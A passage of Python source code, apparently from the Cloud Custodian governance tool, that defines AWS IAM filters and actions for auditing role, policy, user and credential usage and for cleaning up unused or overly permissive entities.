'usage',
required=('match-operator',),
**schema_attr)
permissions = ('iam:GenerateServiceLastAccessedDetails',
'iam:GetServiceLastAccessedDetails')
def process(self, resources, event=None):
client = local_session(self.manager.session_factory).client('iam')
job_resource_map = {}
for arn, r in zip(self.manager.get_arns(resources), resources):
try:
jid = self.manager.retry(
client.generate_service_last_accessed_details,
Arn=arn)['JobId']
job_resource_map[jid] = r
except client.exceptions.NoSuchEntityException:
continue
conf = dict(self.data)
conf.pop('match-operator')
saf = MultiAttrFilter(conf)
saf.multi_attrs = self.SERVICE_ATTR
results = []
match_operator = self.data.get('match-operator', 'all')
while job_resource_map:
job_results_map = {}
for jid, r in job_resource_map.items():
result = self.manager.retry(
client.get_service_last_accessed_details, JobId=jid)
if result['JobStatus'] != self.JOB_COMPLETE:
continue
job_results_map[jid] = result['ServicesLastAccessed']
for jid, saf_results in job_results_map.items():
r = job_resource_map.pop(jid)
saf_matches = saf.process(saf_results)
if match_operator == 'all' and len(saf_matches) == len(saf_results):
results.append(r)
elif saf_matches:
results.append(r)
time.sleep(self.data.get('poll-delay', 2))
return results
@User.filter_registry.register('check-permissions')
@Group.filter_registry.register('check-permissions')
@Role.filter_registry.register('check-permissions')
@Policy.filter_registry.register('check-permissions')
class CheckPermissions(Filter):
"""Check IAM permissions associated with a resource.
:example:
Find users that can create other users
.. code-block:: yaml
policies:
- name: super-users
resource: iam-user
filters:
- type: check-permissions
match: allowed
actions:
- iam:CreateUser
"""
schema = type_schema(
'check-permissions', **{
'match': {'oneOf': [
{'enum': ['allowed', 'denied']},
{'$ref': '#/definitions/filters/valuekv'},
{'$ref': '#/definitions/filters/value'}]},
'match-operator': {'enum': ['and', 'or']},
'actions': {'type': 'array', 'items': {'type': 'string'}},
'required': ('actions', 'match')})
schema_alias = True
policy_annotation = 'c7n:policy'
eval_annotation = 'c7n:perm-matches'
def get_permissions(self):
if self.manager.type == 'iam-policy':
return ('iam:SimulateCustomPolicy',)
return ('iam:SimulatePrincipalPolicy',)
def process(self, resources, event=None):
client = local_session(self.manager.session_factory).client('iam')
actions = self.data['actions']
matcher = self.get_eval_matcher()
operator = self.data.get('match-operator', 'and') == 'and' and all or any
results = []
eval_cache = {}
for arn, r in zip(self.get_iam_arns(resources), resources):
if arn is None:
continue
if arn in eval_cache:
evaluations = eval_cache[arn]
else:
evaluations = self.get_evaluations(client, arn, r, actions)
eval_cache[arn] = evaluations
matches = []
matched = []
for e in evaluations:
match = matcher(e)
if match:
matched.append(e)
matches.append(match)
if operator(matches):
r[self.eval_annotation] = matched
results.append(r)
return results
def get_iam_arns(self, resources):
return self.manager.get_arns(resources)
def get_evaluations(self, client, arn, r, actions):
if self.manager.type == 'iam-policy':
policy = r.get(self.policy_annotation)
if policy is None:
r['c7n:policy'] = policy = client.get_policy_version(
PolicyArn=r['Arn'],
VersionId=r['DefaultVersionId']).get('PolicyVersion', {})
evaluations = self.manager.retry(
client.simulate_custom_policy,
PolicyInputList=[json.dumps(policy['Document'])],
ActionNames=actions).get('EvaluationResults', ())
else:
evaluations = self.manager.retry(
client.simulate_principal_policy,
PolicySourceArn=arn,
ActionNames=actions).get('EvaluationResults', ())
return evaluations
def get_eval_matcher(self):
if isinstance(self.data['match'], six.string_types):
if self.data['match'] == 'denied':
values = ['explicitDeny', 'implicitDeny']
else:
values = ['allowed']
vf = ValueFilter({'type': 'value', 'key':
'EvalDecision', 'value': values,
'op': 'in'})
else:
vf = ValueFilter(self.data['match'])
vf.annotate = False
return vf
class IamRoleUsage(Filter):
def get_permissions(self):
perms = list(itertools.chain(*[
self.manager.get_resource_manager(m).get_permissions()
for m in ['lambda', 'launch-config', 'ec2']]))
perms.extend(['ecs:DescribeClusters', 'ecs:DescribeServices'])
return perms
def service_role_usage(self):
results = set()
results.update(self.scan_lambda_roles())
results.update(self.scan_ecs_roles())
results.update(self.collect_profile_roles())
return results
def instance_profile_usage(self):
results = set()
results.update(self.scan_asg_roles())
results.update(self.scan_ec2_roles())
return results
def scan_lambda_roles(self):
manager = self.manager.get_resource_manager('lambda')
return [r['Role'] for r in manager.resources() if 'Role' in r]
def scan_ecs_roles(self):
results = []
client = local_session(self.manager.session_factory).client('ecs')
for cluster in client.describe_clusters()['clusters']:
services = client.list_services(
cluster=cluster['clusterName'])['serviceArns']
if services:
for service in client.describe_services(
cluster=cluster['clusterName'],
services=services)['services']:
if 'roleArn' in service:
results.append(service['roleArn'])
return results
def collect_profile_roles(self):
# Collect iam roles attached to instance profiles of EC2/ASG resources
profiles = set()
profiles.update(self.scan_asg_roles())
profiles.update(self.scan_ec2_roles())
manager = self.manager.get_resource_manager('iam-profile')
iprofiles = manager.resources()
results = []
for p in iprofiles:
if p['InstanceProfileName'] not in profiles:
continue
for role in p.get('Roles', []):
results.append(role['RoleName'])
return results
def scan_asg_roles(self):
manager = self.manager.get_resource_manager('launch-config')
return [r['IamInstanceProfile'] for r in manager.resources() if (
'IamInstanceProfile' in r)]
def scan_ec2_roles(self):
manager = self.manager.get_resource_manager('ec2')
results = []
for e in manager.resources():
# do not include instances that have been recently terminated
if e['State']['Name'] == 'terminated':
continue
profile_arn = e.get('IamInstanceProfile', {}).get('Arn', None)
if not profile_arn:
continue
# split arn to get the profile name
results.append(profile_arn.split('/')[-1])
return results
###################
# IAM Roles #
###################
@Role.filter_registry.register('used')
class UsedIamRole(IamRoleUsage):
"""Filter IAM roles that are either being used or not
Checks for usage on EC2, Lambda, ECS only
:example:
.. code-block:: yaml
policies:
- name: iam-role-in-use
resource: iam-role
filters:
- type: used
state: true
"""
schema = type_schema(
'used',
state={'type': 'boolean'})
def process(self, resources, event=None):
roles = self.service_role_usage()
if self.data.get('state', True):
return [r for r in resources if (
r['Arn'] in roles or r['RoleName'] in roles)]
return [r for r in resources if (
r['Arn'] not in roles and r['RoleName'] not in roles)]
@Role.filter_registry.register('unused')
class UnusedIamRole(IamRoleUsage):
"""Filter IAM roles that are either being used or not
This filter has been deprecated. Please use the 'used' filter
with the 'state' attribute to get unused iam roles
Checks for usage on EC2, Lambda, ECS only
:example:
.. code-block:: yaml
policies:
- name: iam-roles-not-in-use
resource: iam-role
filters:
- type: used
state: false
"""
schema = type_schema('unused')
def process(self, resources, event=None):
return UsedIamRole({'state': False}, self.manager).process(resources)
@Role.filter_registry.register('cross-account')
class RoleCrossAccountAccess(CrossAccountAccessFilter):
policy_attribute = 'AssumeRolePolicyDocument'
permissions = ('iam:ListRoles',)
schema = type_schema(
'cross-account',
# white list accounts
whitelist_from=ValuesFrom.schema,
whitelist={'type': 'array', 'items': {'type': 'string'}})
@Role.filter_registry.register('has-inline-policy')
class IamRoleInlinePolicy(Filter):
"""Filter IAM roles that have an inline-policy attached
True: Filter roles that have an inline-policy
False: Filter roles that do not have an inline-policy
:example:
.. code-block:: yaml
policies:
- name: iam-roles-with-inline-policies
resource: iam-role
filters:
- type: has-inline-policy
value: True
"""
schema = type_schema('has-inline-policy', value={'type': 'boolean'})
permissions = ('iam:ListRolePolicies',)
def _inline_policies(self, client, resource):
policies = client.list_role_policies(
RoleName=resource['RoleName'])['PolicyNames']
resource['c7n:InlinePolicies'] = policies
return resource
def process(self, resources, event=None):
c = local_session(self.manager.session_factory).client('iam')
res = []
value = self.data.get('value', True)
for r in resources:
r = self._inline_policies(c, r)
if len(r['c7n:InlinePolicies']) > 0 and value:
res.append(r)
if len(r['c7n:InlinePolicies']) == 0 and not value:
res.append(r)
return res
@Role.filter_registry.register('has-specific-managed-policy')
class SpecificIamRoleManagedPolicy(Filter):
"""Filter IAM roles that has a specific policy attached
For example, if the user wants to check all roles with 'admin-policy':
:example:
.. code-block:: yaml
policies:
- name: iam-roles-have-admin
resource: iam-role
filters:
- type: has-specific-managed-policy
value: admin-policy
"""
schema = type_schema('has-specific-managed-policy', value={'type': 'string'})
permissions = ('iam:ListAttachedRolePolicies',)
def _managed_policies(self, client, resource):
return [r['PolicyName'] for r in client.list_attached_role_policies(
RoleName=resource['RoleName'])['AttachedPolicies']]
def process(self, resources, event=None):
c = local_session(self.manager.session_factory).client('iam')
if self.data.get('value'):
return [r for r in resources if self.data.get('value') in self._managed_policies(c, r)]
return []
@Role.filter_registry.register('no-specific-managed-policy')
class NoSpecificIamRoleManagedPolicy(Filter):
"""Filter IAM roles that do not have a specific policy attached
For example, if the user wants to check all roles without 'ip-restriction':
:example:
.. code-block:: yaml
policies:
- name: iam-roles-no-ip-restriction
resource: iam-role
filters:
- type: no-specific-managed-policy
value: ip-restriction
"""
schema = type_schema('no-specific-managed-policy', value={'type': 'string'})
permissions = ('iam:ListAttachedRolePolicies',)
def _managed_policies(self, client, resource):
return [r['PolicyName'] for r in client.list_attached_role_policies(
RoleName=resource['RoleName'])['AttachedPolicies']]
def process(self, resources, event=None):
c = local_session(self.manager.session_factory).client('iam')
if self.data.get('value'):
return [r for r in resources if not self.data.get('value') in
self._managed_policies(c, r)]
return []
@Role.action_registry.register('set-policy')
class SetPolicy(BaseAction):
"""Set a specific IAM policy as attached or detached on a role.
You will identify the policy by its arn.
Returns a list of roles modified by the action.
For example, if you want to automatically attach a policy to all roles which don't have it...
:example:
.. code-block:: yaml
- name: iam-attach-role-policy
resource: iam-role
filters:
- type: no-specific-managed-policy
value: my-iam-policy
actions:
- type: set-policy
state: detached
arn: "*"
- type: set-policy
state: attached
arn: arn:aws:iam::123456789012:policy/my-iam-policy
"""
schema = type_schema(
'set-policy',
state={'enum': ['attached', 'detached']},
arn={'type': 'string'},
required=['state', 'arn'])
permissions = ('iam:AttachRolePolicy', 'iam:DetachRolePolicy',)
def validate(self):
if self.data.get('state') == 'attached' and self.data.get('arn') == "*":
raise PolicyValidationError(
'* operator is not supported for state: attached on %s' % (self.manager.data))
def process(self, resources):
client = local_session(self.manager.session_factory).client('iam')
policy_arn = self.data['arn']
state = self.data['state']
for r in resources:
if state == 'attached':
client.attach_role_policy(
RoleName=r['RoleName'],
PolicyArn=policy_arn)
elif state == 'detached' and policy_arn != "*":
try:
client.detach_role_policy(
RoleName=r['RoleName'],
PolicyArn=policy_arn)
except client.exceptions.NoSuchEntityException:
continue
elif state == 'detached' and policy_arn == "*":
try:
self.detach_all_policies(client, r)
except client.exceptions.NoSuchEntityException:
continue
def detach_all_policies(self, client, resource):
attached_policy = client.list_attached_role_policies(RoleName=resource['RoleName'])
policy_arns = [p.get('PolicyArn') for p in attached_policy['AttachedPolicies']]
for parn in policy_arns:
client.detach_role_policy(RoleName=resource['RoleName'], PolicyArn=parn)
@Role.action_registry.register('delete')
class RoleDelete(BaseAction):
"""Delete an IAM Role.
For example, if you want to automatically delete an unused IAM role.
:example:
.. code-block:: yaml
- name: iam-delete-unused-role
resource: iam-role
filters:
- type: usage
match-operator: all
LastAuthenticated: null
actions:
- type: delete
force: true
"""
schema = type_schema('delete', force={'type': 'boolean'})
permissions = ('iam:DeleteRole',)
def process(self, resources):
client = local_session(self.manager.session_factory).client('iam')
error = None
if self.data.get('force', False):
policy_setter = self.manager.action_registry['set-policy'](
{'state': 'detached', 'arn': '*'}, self.manager)
policy_setter.process(resources)
for r in resources:
try:
client.delete_role(RoleName=r['RoleName'])
except client.exceptions.DeleteConflictException as e:
self.log.warning(
"Role:%s cannot be deleted, set force to detach policy and delete"
% r['Arn'])
error = e
except client.exceptions.NoSuchEntityException:
continue
except client.exceptions.UnmodifiableEntityException:
continue
if error:
raise error
######################
# IAM Policies #
######################
@Policy.filter_registry.register('used')
class UsedIamPolicies(Filter):
"""Filter IAM policies that are being used
(either attached to some roles or used as a permissions boundary).
:example:
.. code-block:: yaml
policies:
- name: iam-policy-used
resource: iam-policy
filters:
- type: used
"""
schema = type_schema('used')
permissions = ('iam:ListPolicies',)
def process(self, resources, event=None):
return [r for r in resources if
r['AttachmentCount'] > 0 or r.get('PermissionsBoundaryUsageCount', 0) > 0]
@Policy.filter_registry.register('unused')
class UnusedIamPolicies(Filter):
"""Filter IAM policies that are not being used
(neither attached to any roles nor used as a permissions boundary).
:example:
.. code-block:: yaml
policies:
- name: iam-policy-unused
resource: iam-policy
filters:
- type: unused
"""
schema = type_schema('unused')
permissions = ('iam:ListPolicies',)
def process(self, resources, event=None):
return [r for r in resources if
r['AttachmentCount'] == 0 and r.get('PermissionsBoundaryUsageCount', 0) == 0]
@Policy.filter_registry.register('has-allow-all')
class AllowAllIamPolicies(Filter):
"""Check if IAM policy resource(s) have allow-all IAM policy statement block.
This allows users to implement CIS AWS check 1.24 which states that no
policy must exist with the following requirements.
Policy must have 'Action' and Resource = '*' with 'Effect' = 'Allow'
The policy will trigger on the following IAM policy (statement).
For example:
.. code-block:: json
{
"Version": "2012-10-17",
"Statement": [{
"Action": "*",
"Resource": "*",
"Effect": "Allow"
}]
}
Additionally, the policy checks if the statement has no 'Condition' or
'NotAction'.
For example, if the user wants to check all used policies and filter on
allow all:
.. code-block:: yaml
- name: iam-no-used-all-all-policy
resource: iam-policy
filters:
- type: used
- type: has-allow-all
Note that scanning and getting all policies and all statements can take
a while. Use it sparingly or combine it with filters such as 'used' as
above.
"""
schema = type_schema('has-allow-all')
permissions = ('iam:ListPolicies', 'iam:ListPolicyVersions')
def has_allow_all_policy(self, client, resource):
statements = client.get_policy_version(
PolicyArn=resource['Arn'],
VersionId=resource['DefaultVersionId']
)['PolicyVersion']['Document']['Statement']
if isinstance(statements, dict):
statements = [statements]
for s in statements:
if ('Condition' not in s and
'Action' in s and
isinstance(s['Action'], six.string_types) and
s['Action'] == "*" and
'Resource' in s and
isinstance(s['Resource'], six.string_types) and
s['Resource'] == "*" and
s['Effect'] == "Allow"):
return True
return False
def process(self, resources, event=None):
c = local_session(self.manager.session_factory).client('iam')
results = [r for r in resources if self.has_allow_all_policy(c, r)]
self.log.info(
"%d of %d iam policies have allow all.",
len(results), len(resources))
return results
@Policy.action_registry.register('delete')
class PolicyDelete(BaseAction):
"""Delete an IAM Policy.
For example, if you want to automatically delete all unused IAM policies.
:example:
.. code-block:: yaml
- name: iam-delete-unused-policies
resource: iam-policy
filters:
- type: unused
actions:
- delete
"""
schema = type_schema('delete')
permissions = ('iam:DeletePolicy',)
def process(self, resources):
client = local_session(self.manager.session_factory).client('iam')
rcount = len(resources)
resources = [r for r in resources if Arn.parse(r['Arn']).account_id != 'aws']
if len(resources) != rcount:
self.log.warning("Implicitly filtering AWS managed policies: %d -> %d",
rcount, len(resources))
for r in resources:
if r.get('DefaultVersionId', '') != 'v1':
versions = [v['VersionId'] for v in client.list_policy_versions(
PolicyArn=r['Arn']).get('Versions') if not v.get('IsDefaultVersion')]
for v in versions:
client.delete_policy_version(PolicyArn=r['Arn'], VersionId=v)
client.delete_policy(PolicyArn=r['Arn'])
###############################
# IAM Instance Profiles #
###############################
@InstanceProfile.filter_registry.register('used')
class UsedInstanceProfiles(IamRoleUsage):
"""Filter IAM profiles that are being used.
:example:
.. code-block:: yaml
policies:
- name: iam-instance-profiles-in-use
resource: iam-profile
filters:
- type: used
"""
schema = type_schema('used')
def process(self, resources, event=None):
results = []
profiles = self.instance_profile_usage()
for r in resources:
if r['Arn'] in profiles or r['InstanceProfileName'] in profiles:
results.append(r)
self.log.info(
"%d of %d instance profiles currently in use." % (
len(results), len(resources)))
return results
@InstanceProfile.filter_registry.register('unused')
class UnusedInstanceProfiles(IamRoleUsage):
"""Filter IAM profiles that are not being used
:example:
.. code-block:: yaml
policies:
- name: iam-instance-profiles-not-in-use
resource: iam-profile
filters:
- type: unused
"""
schema = type_schema('unused')
def process(self, resources, event=None):
results = []
profiles = self.instance_profile_usage()
for r in resources:
if (r['Arn'] not in profiles or r['InstanceProfileName'] not in profiles):
results.append(r)
self.log.info(
"%d of %d instance profiles currently not in use." % (
len(results), len(resources)))
return results
###################
# IAM Users #
###################
class CredentialReport(Filter):
"""Use IAM Credential report to filter users.
The IAM Credential report aggregates multiple pieces of
information on iam users. This makes it highly efficient for
querying multiple aspects of a user that would otherwise require
per user api calls.
https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_getting-report.html
For example if we wanted to retrieve all users with mfa who have
never used their password but have active access keys from the
last month
.. code-block:: yaml
- name: iam-mfa-active-keys-no-login
resource: iam-user
filters:
- type: credential
key: mfa_active
value: true
- type: credential
key: password_last_used
value: absent
- type: credential
key: access_keys.last_used
value_type: age
value: 30
op: less-than
Credential Report Transforms
We perform some default transformations from the raw
credential report. Sub-objects (access_key_1, cert_2)
are turned into array of dictionaries for matching
purposes with their common prefixes stripped.
N/A values are turned into None, TRUE/FALSE are turned
into boolean values.
"""
schema = type_schema(
'credential',
value_type={'$ref': '#/definitions/filters_common/value_types'},
key={'type': 'string',
'title': 'report key to search',
'enum': [
'user',
'arn',
'user_creation_time',
'password_enabled',
'password_last_used',
'password_last_changed',
'password_next_rotation',
'mfa_active',
'access_keys',
'access_keys.active',
'access_keys.last_used_date',
'access_keys.last_used_region',
'access_keys.last_used_service',
'access_keys.last_rotated',
'certs',
'certs.active',
'certs.last_rotated',
]},
value={'$ref': '#/definitions/filters_common/value'},
op={'$ref': '#/definitions/filters_common/comparison_operators'},
report_generate={
'title': 'Generate a report if none is present.',
'default': True,
'type': 'boolean'},
report_delay={
'title': 'Number of seconds to wait for report generation.',
'default': 10,
'type': 'number'},
report_max_age={
'title': 'Number of seconds to consider a report valid.',
'default': 60 * 60 * 24,
'type': 'number'})
list_sub_objects = (
('access_key_1_', 'access_keys'),
('access_key_2_', 'access_keys'),
('cert_1_', 'certs'),
('cert_2_', 'certs'))
# for access keys only
matched_annotation_key = 'c7n:matched-keys'
permissions = ('iam:GenerateCredentialReport',
'iam:GetCredentialReport')
def get_value_or_schema_default(self, k):
if k in self.data:
return self.data[k]
return self.schema['properties'][k]['default']
def get_credential_report(self):
report = self.manager._cache.get('iam-credential-report')
if report:
return report
data = self.fetch_credential_report()
report = {}
if isinstance(data, six.binary_type):
reader = csv.reader(io.StringIO(data.decode('utf-8')))
else:
reader = csv.reader(io.StringIO(data))
headers = next(reader)
for line in reader:
info = dict(zip(headers, line))
report[info['user']] = self.process_user_record(info)
self.manager._cache.save('iam-credential-report', report)
return report
@classmethod
def process_user_record(cls, info):
"""Type convert the csv record, modifies in place."""
keys = list(info.keys())
# Value conversion
for k in keys:
v = info[k]
if v in ('N/A', 'no_information'):
info[k] = None
elif v == 'false':
info[k] = False
elif v == 'true':
info[k] = True
# Object conversion
for p, t in cls.list_sub_objects:
obj = dict([(k[len(p):], info.pop(k))
for k in keys if k.startswith(p)])
if obj.get('active', False):
info.setdefault(t, []).append(obj)
return info
def fetch_credential_report(self):
client = local_session(self.manager.session_factory).client('iam')
try:
report = client.get_credential_report()
except ClientError as e:
if e.response['Error']['Code'] != 'ReportNotPresent':
raise
report = None
if report:
threshold = datetime.datetime.now(tz=tzutc()) - timedelta(
seconds=self.get_value_or_schema_default(
'report_max_age'))
if not report['GeneratedTime'].tzinfo:
threshold = threshold.replace(tzinfo=None)
if report['GeneratedTime'] < threshold:
report = None
if report is None:
if not self.get_value_or_schema_default('report_generate'):
raise ValueError("Credential Report Not Present")
client.generate_credential_report()
time.sleep(self.get_value_or_schema_default('report_delay'))
report = client.get_credential_report()
return report['Content']
def process(self, resources, event=None):
if '.' in self.data['key']:
self.matcher_config = dict(self.data)
self.matcher_config['key'] = self.data['key'].split('.', 1)[1]
return []
def match(self, resource, info):
if info is None:
return False
k = self.data.get('key')
if '.' not in k:
vf = ValueFilter(self.data)
vf.annotate = False
return vf(info)
# access key matching
prefix, sk = k.split('.', 1)
vf = ValueFilter(self.matcher_config)
vf.annotate = False
# annotation merging with previous respecting block operators
k_matched = []
for v in info.get(prefix, ()):
if vf.match(v):
k_matched.append(v)
for k in k_matched:
k['c7n:match-type'] = 'credential'
self.merge_annotation(resource, self.matched_annotation_key, k_matched)
return bool(k_matched)
@User.filter_registry.register('credential')
class UserCredentialReport(CredentialReport):
def process(self, resources, event=None):
super(UserCredentialReport, self).process(resources, event)
report = self.get_credential_report()
if report is None:
return []
results = []
for r in resources:
info = report.get(r['UserName'])
if self.match(r, info):
r['c7n:credential-report'] = info
results.append(r)
return results
@User.filter_registry.register('has-inline-policy')
class IamUserInlinePolicy(Filter):
"""
Filter IAM users that have an inline-policy attached
True: Filter users that have an inline-policy
False: Filter users that do not have an inline-policy
"""
schema = type_schema('has-inline-policy', value={'type': 'boolean'})
permissions = ('iam:ListUserPolicies',)
def _inline_policies(self, client, resource):
resource['c7n:InlinePolicies'] = client.list_user_policies(
UserName=resource['UserName'])['PolicyNames']
return resource
def process(self, resources, event=None):
c = local_session(self.manager.session_factory).client('iam')
value = self.data.get('value', True)
res = []
for r in resources:
r = self._inline_policies(c, r)
if len(r['c7n:InlinePolicies']) > 0 and value:
res.append(r)
if len(r['c7n:InlinePolicies']) == 0 and not value:
res.append(r)
return res
@User.filter_registry.register('policy')
class UserPolicy(ValueFilter):
"""Filter IAM users based on attached policy values
:example:
.. code-block:: yaml
policies:
- name: iam-users-with-admin-access
resource: iam-user
filters:
- type: policy
key: PolicyName
value: AdministratorAccess
"""
schema = type_schema('policy', rinherit=ValueFilter.schema)
schema_alias = False
permissions = ('iam:ListAttachedUserPolicies',)
def user_policies(self, user_set):
client = local_session(self.manager.session_factory).client('iam')
for u in user_set:
if 'c7n:Policies' not in u:
u['c7n:Policies'] = []
aps = client.list_attached_user_policies(
UserName=u['UserName'])['AttachedPolicies']
for ap in aps:
u['c7n:Policies'].append(
client.get_policy(PolicyArn=ap['PolicyArn'])['Policy'])
def process(self, resources, event=None):
user_set = chunks(resources, size=50)
with self.executor_factory(max_workers=2) as w:
self.log.debug(
"Querying %d users policies" % len(resources))
list(w.map(self.user_policies, user_set))
matched = []
for r in resources:
for p in r['c7n:Policies']:
if self.match(p) and r not in matched:
matched.append(r)
return matched
@User.filter_registry.register('group')
class GroupMembership(ValueFilter):
"""Filter IAM users based on attached group values
:example:
.. code-block:: yaml
policies:
- name: iam-users-in-admin-group
resource: iam-user
filters:
- type: group
key: GroupName
value: Admins
"""
schema = type_schema('group', rinherit=ValueFilter.schema)
schema_alias = False
permissions = ('iam:ListGroupsForUser',)
def get_user_groups(self, client, user_set):
for u in user_set:
u['c7n:Groups'] = client.list_groups_for_user(
UserName=u['UserName'])['Groups']
def process(self, resources, event=None):
client = local_session(self.manager.session_factory).client('iam')
with self.executor_factory(max_workers=2) as w:
futures = []
for user_set in chunks(
[r for r in resources if 'c7n:Groups' not in r], size=50):
futures.append(
w.submit(self.get_user_groups, client, user_set))
for f in as_completed(futures):
pass
matched = []
for r in resources:
for p in r.get('c7n:Groups', []):
if self.match(p) and r not in matched:
matched.append(r)
return matched
@User.filter_registry.register('access-key')
class UserAccessKey(ValueFilter):
"""Filter IAM users based on access-key values
:example:
.. code-block:: yaml
policies:
- name: iam-users-with-active-keys
resource: iam-user
filters:
- type: access-key
key: Status
value: Active
"""
schema = type_schema('access-key', rinherit=ValueFilter.schema)
schema_alias = False
permissions = ('iam:ListAccessKeys',)
annotation_key = 'c7n:AccessKeys'
matched_annotation_key = 'c7n:matched-keys'
annotate = False
def get_user_keys(self, client, user_set):
for u in user_set:
u[self.annotation_key] = self.manager.retry(
client.list_access_keys,
UserName=u['UserName'])['AccessKeyMetadata']
def process(self, resources, event=None):
client = local_session(self.manager.session_factory).client('iam')
with self.executor_factory(max_workers=2) as w:
augment_set = [r for r in resources if self.annotation_key not in r]
self.log.debug(
"Querying %d users' api keys" % len(augment_set))
list(w.map(
functools.partial(self.get_user_keys, client),
chunks(augment_set, 50)))
matched = []
for r in resources:
k_matched = []
for k in r[self.annotation_key]:
if self.match(k):
k_matched.append(k)
for k in k_matched:
k['c7n:matched-type'] = 'access'
self.merge_annotation(r, self.matched_annotation_key, k_matched)
if k_matched:
matched.append(r)
return matched
# Mfa-device filter for iam-users
@User.filter_registry.register('mfa-device')
class UserMfaDevice(ValueFilter):
"""Filter iam-users based on mfa-device status
:example:
.. code-block:: yaml
policies:
- name: mfa-enabled-users
resource: iam-user
filters:
- type: mfa-device
key: UserName
value: not-null
"""
schema = type_schema('mfa-device', rinherit=ValueFilter.schema)
schema_alias = False
permissions = ('iam:ListMfaDevices',)
def __init__(self, *args, **kw):
super(UserMfaDevice, self).__init__(*args, **kw)
self.data['key'] = 'MFADevices'
def process(self, resources, event=None):
def _user_mfa_devices(resource):
client = local_session(self.manager.session_factory).client('iam')
resource['MFADevices'] = client.list_mfa_devices(
UserName=resource['UserName'])['MFADevices']
with self.executor_factory(max_workers=2) as w:
query_resources = [
r for r in resources if 'MFADevices' not in r]
self.log.debug(
"Querying %d users' mfa devices" % len(query_resources))
list(w.map(_user_mfa_devices, query_resources))
matched = []
for r in resources:
if self.match(r):
matched.append(r)
return matched
@User.action_registry.register('post-finding')
class UserFinding(OtherResourcePostFinding):
def format_resource(self, r):
if any(filter(lambda x: isinstance(x, UserAccessKey), self.manager.iter_filters())):
details = {
"UserName": "arn:aws:iam:{}:user/{}".format(
self.manager.config.account_id, r["c7n:AccessKeys"][0]["UserName"]
),
"Status": r["c7n:AccessKeys"][0]["Status"],
"CreatedAt": r["c7n:AccessKeys"][0]["CreateDate"].isoformat(),
}
accesskey = {
"Type": "AwsIamAccessKey",
"Id": r["c7n:AccessKeys"][0]["AccessKeyId"],
"Region": self.manager.config.region,
"Details": {"AwsIamAccessKey": filter_empty(details)},
}
return filter_empty(accesskey)
else:
return super(UserFinding, self).format_resource(r)
@User.action_registry.register('delete')
class UserDelete(BaseAction):
"""Delete a user or properties of a user.
For example if you want to have a whitelist of valid (machine-)users
and want to ensure that no users have been clicked without documentation.
You can use both the 'credential' or the 'username'
filter. 'credential' will have an SLA of 4h,
(http://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_getting-report.html),
but the added benefit of performing less API calls, whereas
'username' will make more API calls, but have a SLA of your cache.
:example:
.. code-block:: yaml
# using a 'credential' filter'
- name: iam-only-whitelisted-users
resource: iam-user
filters:
- type: credential
key: user
op: not-in
value:
- valid-user-1
- valid-user-2
actions:
- delete
# using a 'username' filter with 'UserName'
- name: iam-only-whitelisted-users
resource: iam-user
filters:
- type: value
key: UserName
op: not-in
value:
- valid-user-1
- valid-user-2
actions:
- delete
# using a 'username' filter with 'Arn'
- name: iam-only-whitelisted-users
resource: iam-user
filters:
- type: value
key: Arn
op: not-in
value:
- arn:aws:iam:123456789012:user/valid-user-1
- arn:aws:iam:123456789012:user/valid-user-2
actions:
- delete
Additionally, you can specify the options to delete properties of an iam-user,
including console-access, access-keys, attached-user-policies,
inline-user-policies, mfa-devices, groups,
ssh-keys, signing-certificates, and service-specific-credentials.
Note: using options will _not_ delete the user itself, only the items specified
by ``options`` that are attached to the respective iam-user. To delete a user
completely, use the ``delete`` action without specifying ``options``.
:example:
.. code-block:: yaml
- name: delete-console-access-unless-valid
comment: |
finds iam-users with console access and deletes console access unless
the username is included in whitelist
resource: iam-user
filters:
- type: username
key: UserName
op: not-in
value:
- valid-user-1
- valid-user-2
- type: credential
key: Status
value: Active
actions:
- type: delete
options:
- console-access
- name: delete-misc-access-for-iam-user
comment: |
deletes multiple options from test_user
resource: iam-user
filters:
- UserName: test_user
actions:
- type: delete
options:
- mfa-devices
- access-keys
- ssh-keys
"""
ORDERED_OPTIONS = OrderedDict([
('console-access', 'delete_console_access'),
('access-keys', 'delete_access_keys'),
('attached-user-policies', 'delete_attached_user_policies'),
('inline-user-policies', 'delete_inline_user_policies'),
('mfa-devices', 'delete_hw_mfa_devices'),
('groups', 'delete_groups'),
('ssh-keys', 'delete_ssh_keys'),
('signing-certificates', 'delete_signing_certificates'),
('service-specific-credentials', 'delete_service_specific_credentials'),
])
COMPOUND_OPTIONS = {
'user-policies': ['attached-user-policies', 'inline-user-policies'],
}
schema = type_schema(
'delete',
options={
'type': 'array',
'items': {
'type': 'string',
'enum': list(ORDERED_OPTIONS.keys()) + list(COMPOUND_OPTIONS.keys()),
}
})
permissions = (
'iam:ListAttachedUserPolicies',
'iam:ListAccessKeys',
'iam:ListGroupsForUser',
'iam:ListMFADevices',
'iam:ListServiceSpecificCredentials',
'iam:ListSigningCertificates',
'iam:ListSSHPublicKeys',
'iam:DeactivateMFADevice',
'iam:DeleteAccessKey',
'iam:DeleteLoginProfile',
'iam:DeleteSigningCertificate',
'iam:DeleteSSHPublicKey',
'iam:DeleteUser',
'iam:DeleteUserPolicy',
'iam:DetachUserPolicy',
'iam:RemoveUserFromGroup')
@staticmethod
def delete_console_access(client, r):
try:
client.delete_login_profile(
UserName=r['UserName'])
except ClientError as e:
if e.response['Error']['Code'] not in ('NoSuchEntity',):
raise
@staticmethod
def delete_access_keys(client, r):
response = client.list_access_keys(UserName=r['UserName'])
for access_key in response['AccessKeyMetadata']:
client.delete_access_key(UserName=r['UserName'],
AccessKeyId=access_key['AccessKeyId'])
@staticmethod
def delete_attached_user_policies(client, r):
response = client.list_attached_user_policies(UserName=r['UserName'])
for user_policy in response['AttachedPolicies']:
client.detach_user_policy(
UserName=r['UserName'], PolicyArn=user_policy['PolicyArn'])
@staticmethod
def delete_inline_user_policies(client, r):
response = client.list_user_policies(UserName=r['UserName'])
for user_policy_name in response['PolicyNames']:
client.delete_user_policy(
UserName=r['UserName'], PolicyName=user_policy_name)
@staticmethod
def delete_hw_mfa_devices(client, r):
response = client.list_mfa_devices(UserName=r['UserName'])
for mfa_device in response['MFADevices']:
client.deactivate_mfa_device(
UserName=r['UserName'], SerialNumber=mfa_device['SerialNumber'])
@staticmethod
def delete_groups(client, r):
response = client.list_groups_for_user(UserName=r['UserName'])
for user_group in response['Groups']:
client.remove_user_from_group(
UserName=r['UserName'], GroupName=user_group['GroupName'])
@staticmethod
def delete_ssh_keys(client, r):
response = client.list_ssh_public_keys(UserName=r['UserName'])
